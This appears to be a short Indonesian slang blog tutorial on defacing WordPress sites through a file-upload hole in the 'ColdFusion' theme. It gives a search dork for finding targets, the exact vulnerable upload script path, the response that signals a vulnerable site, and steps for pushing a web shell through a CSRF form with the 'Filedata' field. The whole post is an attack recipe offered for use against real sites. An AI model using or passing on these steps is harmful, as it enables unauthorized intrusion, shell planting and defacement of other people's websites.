Yo guys masih bersama ane :v Kali ini wa kasih tutorial pepes metode Wordpress ColdFusion File Upload. Gimana caranya? Simak aja guys :v
Bahan" :
Dork : inurl:/wp-content/themes/ColdFusion/ (kembangin lageh ya cuks)
Exploit : www.site.co.li/[path]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
CSRF : TOUCH SENPAI~~!
Langkah" :
1. Dorking lah kayak biasanya :v
2. Udah dapet target? masukin exploit nya www.site.co.li/[path]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php . Vuln? ada tulisan {"status":"NOK", "ERR":"This file is incorect"}
3. Buka CSRF nya lalu masukin target di kolom url. Buat post file nya isi dengan "Filedata". Kalo udah klik kunci lalu browse shell kalean lalu klik genjot!
4. Sukses? Muncul kek digambar
5. Akses? Pencet CTRL+U lalu bakal keliatan deh akses nya. Tinggal di genjot ea :v
Sekian dari ane :v
Maap kalo salah/kurang ya :v
Thanks :*






Comments
Post a Comment